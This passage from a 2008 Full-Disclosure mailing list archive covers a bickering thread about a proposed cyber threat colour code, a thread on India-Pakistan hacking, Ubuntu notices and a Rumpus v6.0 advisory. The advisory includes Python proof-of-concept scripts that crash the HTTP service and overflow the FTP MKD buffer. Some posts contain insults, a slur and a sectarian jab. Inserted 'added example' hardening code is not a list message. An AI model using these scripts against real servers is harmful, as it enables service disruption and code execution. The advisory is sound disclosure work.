From mike.cartall at gmail.com Mon Dec 1 02:41:01 2008
From: mike.cartall at gmail.com (Mike C)
Date: Mon, 1 Dec 2008 03:41:01 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
Message-ID:

Yes,

The project Chroma leads know of various efforts. But these are either
vendor specific, or old and unstandardized. Project Chroma aims to be
very active, and will look to interact with security vendors to
implement the color codes in security products.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

On Sun, Nov 30, 2008 at 6:28 PM, Tomas L. Byrnes wrote:
> The SANS Internet Storm Center has been doing this for ages.
>
> It has the advantage of being data driven, using the DShield reports as
> a primary sensor mechanism.
>
> http://isc.sans.org/
>
>
>
>>-----Original Message-----
>>From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mike C
>>Sent: Saturday, November 29, 2008 9:35 PM
>>To: Full Disclosure
>>Subject: [Full-disclosure] Project Chroma: A color code for the state
>>ofcyber security
>>
>>Hi,
>>
>>It is time to take an example from Homeland Security and define codes
>>of color for cyber-warfare threat levels. I propose the following:
>>
>>Green level: There is negligible threat to online security.
>>Yellow level : There is a minimal level of threat, and this must be
>>monitored and contained.
>>Orange level: This level of threat indicates there are parties who are
>>actively engaging in cyber-warfare. Caution is required when online.
>>Red level: This level indicates a full blown cyber-war. It indicates
>>very high probability of all communications being intercepted.
>>
>>While homeland security's implementation does not seem to have a real
>>world merit, such a threat level would certainly be very useful in the
>>online security realm. Please disseminate this announcement of the
>>project Chroma levels for online security. The immediate mission of
>>the project is to be picked up by the antivirus and security tools
>>vendors, so as to add the color codes to their products and provide
>>users with a tangible measure of their online security.
>>
>>Current status: Threat level Yellow.
>>
>>--
>>MC
>>Security Researcher
>>Lead, Project Chroma.
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>

From mike.cartall at gmail.com Mon Dec 1 02:38:50 2008
From: mike.cartall at gmail.com (Mike C)
Date: Mon, 1 Dec 2008 03:38:50 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
 <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com>
Message-ID:

On Sun, Nov 30, 2008 at 9:51 PM, vulcanius wrote:
> So have you actually come up with a feasible metric for measuring the
> current state of malicious/non-malicious traffic on the tubes vs the current

Yes. I'm working with industry insiders and we have a set of tangible
measurements ready. These will be a part of future Chroma
announcements.

> state of global tube defenses or is n3td3v's abstract world just rubbing off
> on you and all you have is a list of colors and a crazy and horribly
> unrealistic idea in your head?

Such trolling is highly unwarranted. This kind of banter is not
required on FD. I may have to take you up on this offline, and you
don't want this. Ask some former FD posters.
--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From vulcanius at gmail.com Mon Dec 1 03:19:16 2008
From: vulcanius at gmail.com (vulcanius)
Date: Sun, 30 Nov 2008 22:19:16 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
 <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com>
Message-ID:

What are you going to do? Give me a massage? I think I'd like that. But
in all actuality, I can't wait to hear more about these industry insiders
and your techniques for measuring the current level of security
implemented across the tubes. That will be some feat.

On Sun, Nov 30, 2008 at 9:38 PM, Mike C wrote:
> On Sun, Nov 30, 2008 at 9:51 PM, vulcanius wrote:
> > So have you actually come up with a feasible metric for measuring the
> > current state of malicious/non-malicious traffic on the tubes vs the current
>
> Yes. I'm working with industry insiders and we have a set of tangible
> measurements ready. These will be a part of future Chroma
> announcements.
>
> > state of global tube defenses or is n3td3v's abstract world just rubbing off
> > on you and all you have is a list of colors and a crazy and horribly
> > unrealistic idea in your head?
>
> Such trolling is highly unwarranted. This kind of banter is not
> required on FD. I may have to take you up on this offline, and you
> don't want this. Ask some former FD posters.
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>
From vulcanius at gmail.com Mon Dec 1 03:21:06 2008
From: vulcanius at gmail.com (vulcanius)
Date: Sun, 30 Nov 2008 22:21:06 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
Message-ID:

By the way, I also noticed that the new site for your project has the
current threat level as yellow. Is it safe to assume that you've already got
your metric systems in place and running?

On Sun, Nov 30, 2008 at 9:41 PM, Mike C wrote:
> Yes,
>
> The project Chroma leads know of various efforts. But these are either
> vendor specific, or old and unstandardized. Project Chroma aims to be
> very active, and will look to interact with security vendors to
> implement the color codes in security products.
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>
>
> On Sun, Nov 30, 2008 at 6:28 PM, Tomas L. Byrnes wrote:
> > The SANS Internet Storm Center has been doing this for ages.
> >
> > It has the advantage of being data driven, using the DShield reports as
> > a primary sensor mechanism.
> >
> > http://isc.sans.org/
> >
> >
> >
> >>-----Original Message-----
> >>From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mike C
> >>Sent: Saturday, November 29, 2008 9:35 PM
> >>To: Full Disclosure
> >>Subject: [Full-disclosure] Project Chroma: A color code for the state
> >>ofcyber security
> >>
> >>Hi,
> >>
> >>It is time to take an example from Homeland Security and define codes
> >>of color for cyber-warfare threat levels. I propose the following:
> >>
> >>Green level: There is negligible threat to online security.
> >>Yellow level : There is a minimal level of threat, and this must be
> >>monitored and contained.
> >>Orange level: This level of threat indicates there are parties who are
> >>actively engaging in cyber-warfare. Caution is required when online.
> >>Red level: This level indicates a full blown cyber-war. It indicates
> >>very high probability of all communications being intercepted.
> >>
> >>While homeland security's implementation does not seem to have a real
> >>world merit, such a threat level would certainly be very useful in the
> >>online security realm. Please disseminate this announcement of the
> >>project Chroma levels for online security. The immediate mission of
> >>the project is to be picked up by the antivirus and security tools
> >>vendors, so as to add the color codes to their products and provide
> >>users with a tangible measure of their online security.
> >>
> >>Current status: Threat level Yellow.
> >>
> >>--
> >>MC
> >>Security Researcher
> >>Lead, Project Chroma.
> >>
> >
>

From rholgstad at gmail.com Mon Dec 1 03:36:39 2008
From: rholgstad at gmail.com (rholgstad)
Date: Sun, 30 Nov 2008 21:36:39 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
Message-ID: <49335BC7.7010403@gmail.com>

Do you actually want to go this route after seeing dhs being laughed at
daily with their retarded color scheme?
You realize that color schemes do
nothing for real security and are just more policy BS right?

Mike C wrote:
> Yes,
>
> The project Chroma leads know of various efforts. But these are either
> vendor specific, or old and unstandardized. Project Chroma aims to be
> very active, and will look to interact with security vendors to
> implement the color codes in security products.
>
>

From raju at linux-delhi.org Mon Dec 1 03:43:54 2008
From: raju at linux-delhi.org (Raj Mathur)
Date: Mon, 1 Dec 2008 09:13:54 +0530
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com>
Message-ID: <200812010913.54479.raju@linux-delhi.org>

On Monday 01 Dec 2008, vulcanius wrote:
> [snip] is n3td3v's abstract world [more snip]

Er, they're the same person!

From tomb at byrneit.net Mon Dec 1 03:56:58 2008
From: tomb at byrneit.net (Tomas L. Byrnes)
Date: Sun, 30 Nov 2008 19:56:58 -0800
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <49335BC7.7010403@gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
 <49335BC7.7010403@gmail.com>
Message-ID: <70D072392E56884193E3D2DE09C097A9FA3E@pascal.zaphodb.org>

Can we have patterns, so it's accessible? :-)

My point was it's been done, in a data driven manner, so any utility
that might be realized from such a scheme has already been provided.

I make no representations regarding the utility of colors, but I do use
the numeric value to bias how sensitive my SIM/SEMs are to IDS alerts.

>-----Original Message-----
>From: rholgstad [mailto:rholgstad at gmail.com]
>Sent: Sunday, November 30, 2008 7:37 PM
>To: Mike C
>Cc: Tomas L. Byrnes; Full Disclosure
>Subject: Re: [Full-disclosure] Project Chroma: A color code for the
>state ofcyber security
>
>Do you actually want to go this route after seeing dhs being laughed at
>daily with their retarded color scheme?
>You realize that color schemes
>do nothing for real security and are just more policy BS right?
>
>Mike C wrote:
>> Yes,
>>
>> The project Chroma leads know of various efforts. But these are either
>> vendor specific, or old and unstandardized. Project Chroma aims to be
>> very active, and will look to interact with security vendors to
>> implement the color codes in security products.
>>
>>

From taneja.security at gmail.com Mon Dec 1 04:48:40 2008
From: taneja.security at gmail.com (taneja.security at gmail.com)
Date: Mon, 1 Dec 2008 10:18:40 +0530
Subject: [Full-disclosure] Indian allegations alarm Pakistan
In-Reply-To: <197321660811300753p9b7de46i62ca541c08e3892c@mail.gmail.com>
References: <4b6ee9310811291610r77106e6xf5fd86d4f5305414@mail.gmail.com>
 <200811300739.52113.raju@linux-delhi.org>
 <4b6ee9310811292141p416aaf4eiad9fe9d52d31b2cc@mail.gmail.com>
 <8a6b8e350811300412ub6205cdg39fd0773985ad93d@mail.gmail.com>
 <197321660811300753p9b7de46i62ca541c08e3892c@mail.gmail.com>
Message-ID:

Already started ....

http://newsx.com/story/36421

On Sun, Nov 30, 2008 at 9:23 PM, Some Guy Posting To Full Disclosure <fd.leach at googlemail.com> wrote:
> Aren't they just a bunch of kids trying to brag on IRC that they
> hacked their 'enemy' country? Maybe they don't like them because of
> propaganda is telling them Indians did the bombing. Or maybe they,
> like most kids, they've no idea about current affairs and just want to
> prove themselves good in their own little world.
>
> Like what happened with Russia vs. Georgia.
>
> On 11/30/08, James Matthews wrote:
> > India was attacked the attackers came from Pakistan, I understand why
> > Pakistan feels threatened however why would they attack Indian sites?
> >
> > On Sun, Nov 30, 2008 at 9:19 AM, Mike C wrote:
> >
> >> On Sun, Nov 30, 2008 at 11:11 AM, n3td3v wrote:
> >> > On Sun, Nov 30, 2008 at 5:25 AM, Mike C wrote:
> >> >>
> >> >>
> >> >> On Sun, Nov 30, 2008 at 7:39 AM, Raj Mathur wrote:
> >> >>>
> >> >>> On Sunday 30 Nov 2008, n3td3v wrote:
> >> >>> > Indian-Pakistan war is about to kick off folks...
> >> >>> >
> >> >>> > http://news.bbc.co.uk/1/hi/world/south_asia/7757031.stm
> >> >>>
> >> >>> I know it's not going to happen, but can I request you once again shut
> >> >>> the fuck up about events that you have no clue about?
> >> >>>
> >> >>> At least try to keep your sensationalist retarded drivel to your own
> >> >>> backyard.
> >> >>
> >> >>
> >> >> Although a knee-jerk reaction, this post has some value.
> >> >>
> >> >> The tensions between the countries is on the rise, and the recent
> >> >> blasts in
> >> >> Bangalore would increase the chances of war. BTW, does anyone have an idea
> >> >> on what kind of cyber-warfare is currently underway between the two nations?
> >> >>
> >> >> --
> >> >> MC
> >> >
> >> > There was a report earlier in the week via pcworld.com, but I don't
> >> > think it's connected to this conflict, maybe just a coincidence:
> >> >
> >> >
> >> > http://www.pcworld.com/businesscenter/article/154544/feuding_india_pakistani_hackers_deface_web_sites.html
> >> >
> >>
> >> Thanks. I'm looking into this and will report on any further info.
> >>
> >> --
> >> MC
> >>
> >
> >
> >
> > --
> > http://www.astorandblack.com/
> >
> > http://www.jewelerslounge.com/liberty-coin-cufflinks
> >
>
>
> --
> I'm your best best friend.
>
> Usually I like it when you contradict me, it might help me learn. Just
> don't be so angry.
From w3bd3vil at gmail.com Mon Dec 1 08:17:06 2008
From: w3bd3vil at gmail.com (webDEViL)
Date: Mon, 1 Dec 2008 13:47:06 +0530
Subject: [Full-disclosure] Indian allegations alarm Pakistan
In-Reply-To: <4932DC7F.9020505@pakcert.org>
References: <4b6ee9310811291610r77106e6xf5fd86d4f5305414@mail.gmail.com>
 <200811300739.52113.raju@linux-delhi.org>
 <4b6ee9310811292141p416aaf4eiad9fe9d52d31b2cc@mail.gmail.com>
 <8a6b8e350811300412ub6205cdg39fd0773985ad93d@mail.gmail.com>
 <4932DC7F.9020505@pakcert.org>
Message-ID: <8656dcd50812010017q56ff99ew872dcb8aa6f1181d@mail.gmail.com>

Everyone knows that, but they are hiding it
That's what Kufr is all about!

On Mon, Dec 1, 2008 at 12:03 AM, Qazi Ahmed wrote:
> do you have any proof to back your theory? how about you feed your brain
> for a change before drawing any conclusion
>
> India uncovers Hindu terror group that carried out bombings blamed on
> Islamists
>
> http://www.belfasttelegraph.co.uk/news/world-news/india-uncovers-hindu-terror-group-that-carried-out-bombings-blamed-on-islamists-14076306.html
>
> Crisis May Shift India's Political Landscape
> http://www.nytimes.com/2008/11/29/world/asia/29india.html
>
>
>
> James Matthews wrote:
> > India was attacked the attackers came from Pakistan, I understand why
> > Pakistan feels threatened however why would they attack Indian sites?
> >
>
>
From akl at experian.dk Mon Dec 1 09:15:59 2008
From: akl at experian.dk (Anders Klixbull)
Date: Mon, 1 Dec 2008 10:15:59 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the stateofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD324C0@PRO-EXCHANGESRV.experian.dk>

Project chroma project?
Welcome to the redundancy department of redundancy..
Mike c aka n3td3v shut the fuck up

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mike C
Sent: 1. december 2008 03:41
To: Tomas L. Byrnes
Cc: Full Disclosure
Subject: Re: [Full-disclosure] Project Chroma: A color code for the stateofcyber security

Yes,

The project Chroma leads know of various efforts. But these are either
vendor specific, or old and unstandardized. Project Chroma aims to be
very active, and will look to interact with security vendors to
implement the color codes in security products.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

On Sun, Nov 30, 2008 at 6:28 PM, Tomas L. Byrnes wrote:
> The SANS Internet Storm Center has been doing this for ages.
>
> It has the advantage of being data driven, using the DShield reports as
> a primary sensor mechanism.
>
> http://isc.sans.org/
>
>
>
>>-----Original Message-----
>>From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mike C
>>Sent: Saturday, November 29, 2008 9:35 PM
>>To: Full Disclosure
>>Subject: [Full-disclosure] Project Chroma: A color code for the state
>>ofcyber security
>>
>>Hi,
>>
>>It is time to take an example from Homeland Security and define codes
>>of color for cyber-warfare threat levels. I propose the following:
>>
>>Green level: There is negligible threat to online security.
>>Yellow level : There is a minimal level of threat, and this must be
>>monitored and contained.
>>Orange level: This level of threat indicates there are parties who are
>>actively engaging in cyber-warfare. Caution is required when online.
>>Red level: This level indicates a full blown cyber-war. It indicates
>>very high probability of all communications being intercepted.
>>
>>While homeland security's implementation does not seem to have a real
>>world merit, such a threat level would certainly be very useful in the
>>online security realm. Please disseminate this announcement of the
>>project Chroma levels for online security. The immediate mission of
>>the project is to be picked up by the antivirus and security tools
>>vendors, so as to add the color codes to their products and provide
>>users with a tangible measure of their online security.
>>
>>Current status: Threat level Yellow.
>>
>>--
>>MC
>>Security Researcher
>>Lead, Project Chroma.
>>
>
From mike.cartall at gmail.com Mon Dec 1 16:06:00 2008
From: mike.cartall at gmail.com (Mike C)
Date: Mon, 1 Dec 2008 17:06:00 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
Message-ID:

On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote:
> By the way, I also noticed that the new site for your project has the
> current threat level as yellow. Is it safe to assume that you've already got
> your metric systems in place and running?
>

Yes,

We do have a working framework for color code generation. The inputs
to this function include

*exploits released in the past week
 - The severity of the exploit
 - The application it was in
 - The language
 - estimated users of the software

*The previous week's color

*Localized nature of exploits.

We cannot comment more on this until it is refined and standardized.
If you are (or know) an antivirus vendor, please contact me offline to
move ahead.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Mon Dec 1 16:07:12 2008
From: mike.cartall at gmail.com (Mike C)
Date: Mon, 1 Dec 2008 17:07:12 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <49335BC7.7010403@gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
 <49335BC7.7010403@gmail.com>
Message-ID:

On Mon, Dec 1, 2008 at 4:36 AM, rholgstad wrote:
> Do you actually want to go this route after seeing dhs being laughed at
> daily with their retarded color scheme? You realize that color schemes do
> nothing for real security and are just more policy BS right?
>

A well implemented system will go a long way in helping security.
The keyword, of course, is _well implemented_, which is our primary aim.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Mon Dec 1 16:09:07 2008
From: mike.cartall at gmail.com (Mike C)
Date: Mon, 1 Dec 2008 17:09:07 +0100
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <200812010913.54479.raju@linux-delhi.org>
References: <4b6ee9310811301017w6a34be74t83c29f847f53381c@mail.gmail.com>
 <200812010913.54479.raju@linux-delhi.org>
Message-ID:

On Mon, Dec 1, 2008 at 4:43 AM, Raj Mathur wrote:
> On Monday 01 Dec 2008, vulcanius wrote:
>> [snip] is n3td3v's abstract world [more snip]
>
> Er, they're the same person!
>

And you are Gordon Brown. Really. Believe me, even though I'm not from
linux-delhi.org

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From rholgstad at gmail.com Mon Dec 1 16:17:23 2008
From: rholgstad at gmail.com (rholgstad)
Date: Mon, 01 Dec 2008 10:17:23 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
 <49335BC7.7010403@gmail.com>
Message-ID: <49340E13.10702@gmail.com>

Please explain how your colored coded system will actually help people

Mike C wrote:
> On Mon, Dec 1, 2008 at 4:36 AM, rholgstad wrote:
>
>> Do you actually want to go this route after seeing dhs being laughed at
>> daily with their retarded color scheme? You realize that color schemes do
>> nothing for real security and are just more policy BS right?
>>
>>
>
> A well implemented system will go a long way in helping security. The
> keyword, of course, is _well implemented_, which is our primary aim.
From rholgstad at gmail.com Mon Dec 1 16:27:29 2008
From: rholgstad at gmail.com (rholgstad)
Date: Mon, 01 Dec 2008 10:27:29 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org>
Message-ID: <49341071.4050608@gmail.com>

and how does making a color based on these inputs protect people?

Mike C wrote:
> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote:
>
>> By the way, I also noticed that the new site for your project has the
>> current threat level as yellow. Is it safe to assume that you've already got
>> your metric systems in place and running?
>>
>>
>
> Yes,
>
> We do have a working framework for color code generation. The inputs
> to this function include
>
> *exploits released in the past week
> - The severity of the exploit
> - The application it was in
> - The language
> - estimated users of the software
>
> *The previous week's color
>
> *Localized nature of exploits.
>
> We cannot comment more on this until it is refined and standardized.
> If you are (or know) an antivirus vendor, please contact me offline to
> move ahead.
>
>

From namn at bluemoon.com.vn Mon Dec 1 16:56:19 2008
From: namn at bluemoon.com.vn (Nam Nguyen)
Date: Mon, 1 Dec 2008 23:56:19 +0700
Subject: [Full-disclosure] [BMSA 2008-09] Two buffer overflow vulnerabilities in Rumpus v6.0
Message-ID: <20081201235619.4633aff7.namn@bluemoon.com.vn>

BLUE MOON SECURITY ADVISORY 2008-09
===================================

:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1

Description
-----------

Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. The first allows an unauthenticated user to crash Rumpus. The latter may result in arbitrary code execution under superuser privilege.
The overflow in the HTTP component is caused by the lack of a boundary check when parsing the HTTP action verb (GET, POST, PUT, etc.). If the verb is exactly 2908 bytes long, the server runs into a segmentation fault and crashes. A manual restart is required. It has been observed that this problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the loss of service.

The overflow in the FTP component is also caused by the lack of a length check when parsing FTP commands that take an argument, such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the argument is copied with ``strcpy`` into an internal buffer. This buffer is 1024 bytes long. When the passed-in argument is longer than 1046 bytes, the instruction pointer will be overwritten. This allows a successful attack to run arbitrary code under the privilege of a superuser (root) by default. Though authorization is required to exploit this security bug, the vulnerability is rated at critical severity because the FTP daemon could be allowing anonymous access.

Workaround
----------

There is no workaround for the first bug. Disable ANONYMOUS and only allow trusted users to use FTP.

Fix
---

Maxum has released Rumpus v6.0.1 which addressed these bugs.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 `_ in notifying vendors.

:Initial vendor contact:

  November 28, 2008: Initial contact sent to support at maxum.com

:Vendor response:

  November 28, 2008: John requested further communications to be sent to the same address.

:Further communication:

  November 28, 2008: Technical details and request for regular update of a patch sent to the vendor.

  November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday, December 01.

  December 01, 2008: Vendor released 6.0.1 and posted release note at http://www.maxum.com/Rumpus/News601.html.
:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

    from socket import socket, AF_INET, SOCK_STREAM

    host = "192.168.1.12"
    port = 80

    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send('z' * 2908 + '\n\n')
    s.recv(1024)
    s.close()

For the vulnerability in FTP component::

    from socket import socket, AF_INET, SOCK_STREAM

    host = "192.168.1.12"
    port = 21
    user = "regular"
    pass_ = "training"

    commands = [
        'user regular\n',
        'pass training\n',
        'mkd ' + 'z' * 1046 + 'abcd\n'
    ]

    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)

    for line in commands:
        s.send(line)
        s.recv(1024)

    s.close()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.
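The two missing checks the advisory describes, written out as an added example (not code from Rumpus, Maxum or Blue Moon Consulting): a bounded FTP command split and a bounded HTTP verb parse that reject overlong input instead of copying it. The function names, status codes and the 8- and 16-byte verb limits are assumptions made for illustration; only the 1024-byte argument buffer comes from the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FTP_ARG_BUF 1024   /* internal buffer size stated in the advisory */
#define FTP_VERB_BUF 8     /* assumption: FTP verbs such as XMKD are short */
#define HTTP_METHOD_BUF 16 /* assumption: no standard HTTP verb is this long */

enum parse_status { PARSE_OK = 0, PARSE_TOO_LONG = -1, PARSE_MALFORMED = -2 };

/* The pattern the advisory describes: the argument is copied with strcpy()
 * and nothing ties its length to the size of dst. Shown for contrast only. */
void ftp_copy_arg_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg); /* writes past dst when strlen(arg) >= FTP_ARG_BUF */
}

/* Hardened form: split "VERB argument\r\n" and refuse anything that does not
 * fit, instead of copying first and hoping. */
int parse_ftp_command(const char *line, char *verb, size_t verb_sz,
                      char *arg, size_t arg_sz)
{
    size_t line_len = strcspn(line, "\r\n"); /* ignore the line terminator */
    size_t verb_len = strcspn(line, " \r\n");
    const char *p = line + verb_len;
    size_t arg_len;

    if (verb_len == 0)
        return PARSE_MALFORMED;
    if (verb_len >= verb_sz)
        return PARSE_TOO_LONG;
    while (*p == ' ')
        p++;
    arg_len = line_len - (size_t)(p - line);
    if (arg_len >= arg_sz) /* leave room for the terminating NUL */
        return PARSE_TOO_LONG;

    memcpy(verb, line, verb_len);
    verb[verb_len] = '\0';
    memcpy(arg, p, arg_len);
    arg[arg_len] = '\0';
    return PARSE_OK;
}

/* Bounded parse of the HTTP action verb: stop at the first space, accept only
 * upper-case letters, and give up as soon as the verb cannot fit. */
int parse_http_method(const char *req, size_t req_len,
                      char *method, size_t method_sz)
{
    size_t i;

    for (i = 0; i < req_len && req[i] != ' '; i++) {
        if (i + 1 >= method_sz)
            return PARSE_TOO_LONG;
        if (!isupper((unsigned char)req[i]))
            return PARSE_MALFORMED;
        method[i] = req[i];
    }
    if (i == 0 || i == req_len) /* empty verb, or no space after it */
        return PARSE_MALFORMED;
    method[i] = '\0';
    return PARSE_OK;
}

int main(void)
{
    char verb[FTP_VERB_BUF], arg[FTP_ARG_BUF], method[HTTP_METHOD_BUF];
    char line[4096];

    /* Constructed inputs, sized like the ones the advisory reports. */
    printf("MKD uploads -> %d\n",
           parse_ftp_command("MKD uploads\r\n", verb, sizeof verb, arg, sizeof arg));

    memcpy(line, "MKD ", 4);
    memset(line + 4, 'z', 1050);
    memcpy(line + 4 + 1050, "\r\n", 3);
    printf("MKD + 1050-byte argument -> %d\n",
           parse_ftp_command(line, verb, sizeof verb, arg, sizeof arg));

    memset(line, 'A', 2908);
    memcpy(line + 2908, " / HTTP/1.0\r\n", 14);
    printf("2908-byte HTTP verb -> %d\n",
           parse_http_method(line, strlen(line), method, sizeof method));
    return 0;
}
```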
From marc.deslauriers at canonical.com Mon Dec 1 17:11:08 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Mon, 01 Dec 2008 12:11:08 -0500
Subject: [Full-disclosure] [USN-681-1] ImageMagick vulnerability
Message-ID: <1228151468.9860.3.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-681-1          December 01, 2008
imagemagick vulnerability
CVE-2008-1096
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  imagemagick                     6:6.2.4.5-0.6ubuntu0.8

Ubuntu 7.10:
  imagemagick                     7:6.2.4.5.dfsg1-2ubuntu1.1

After a standard system upgrade you need to restart any applications
that use ImageMagick, such as OpenOffice.org and Inkscape, to effect
the necessary changes.

Details follow:

It was discovered that ImageMagick did not correctly handle certain
malformed XCF images. If a user were tricked into opening a specially
crafted image with an application that uses ImageMagick, an attacker
could cause a denial of service and possibly execute arbitrary code
with the user's privileges.
From marc.deslauriers at canonical.com Mon Dec 1 17:11:59 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Mon, 01 Dec 2008 12:11:59 -0500
Subject: [Full-disclosure] [USN-682-1] libvorbis vulnerabilities
Message-ID: <1228151519.9860.4.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-682-1          December 01, 2008
libvorbis vulnerabilities
CVE-2008-1419, CVE-2008-1420, CVE-2008-1423
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libvorbis0a                     1.1.2-0ubuntu2.3

Ubuntu 7.10:
  libvorbis0a                     1.2.0.dfsg-1ubuntu0.1

Ubuntu 8.04 LTS:
  libvorbis0a                     1.2.0.dfsg-2ubuntu0.1

After a standard system upgrade you need to restart any applications that
use libvorbis, such as Totem and gtkpod, to effect the necessary changes.

Details follow:

It was discovered that libvorbis did not correctly handle certain
malformed sound files. If a user were tricked into opening a specially
crafted sound file with an application that uses libvorbis, an attacker
could execute arbitrary code with the user's privileges.
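The "following package versions" in USN-681-1 and USN-682-1 are minimum fixed versions, and Debian version strings (epoch, upstream version, revision) do not order correctly as plain strings. The Python below is an added example, not part of the advisories or of Ubuntu's tooling: it reimplements the dpkg ordering rules and audits a constructed package inventory against the fixed versions quoted in the two notices; the function names and the sample inventory are assumptions made for illustration.

```python
import re

# Fixed versions as quoted in USN-681-1 and USN-682-1: (release, package) -> version.
FIXED = {
    ("6.06", "imagemagick"): "6:6.2.4.5-0.6ubuntu0.8",
    ("7.10", "imagemagick"): "7:6.2.4.5.dfsg1-2ubuntu1.1",
    ("6.06", "libvorbis0a"): "1.1.2-0ubuntu2.3",
    ("7.10", "libvorbis0a"): "1.2.0.dfsg-1ubuntu0.1",
    ("8.04", "libvorbis0a"): "1.2.0.dfsg-2ubuntu0.1",
}

# Constructed sample in the shape printed by
#   dpkg-query -W -f='${Package} ${Version}\n'
# (the installed versions here are made up for the example).
SAMPLE_INVENTORY = """\
imagemagick 6:6.2.4.5-0.6ubuntu0.7
libvorbis0a 1.1.2-0ubuntu2.3
bash 3.1-2ubuntu10
"""


def _order(ch):
    """dpkg weight of one non-digit character: '~' first, then letters, then the rest."""
    if ch == "~":
        return -1
    if ch.isalpha():
        return ord(ch)
    return ord(ch) + 256


def _cmp_part(a, b):
    """Compare two upstream-version or revision strings the way dpkg does."""
    while a or b:
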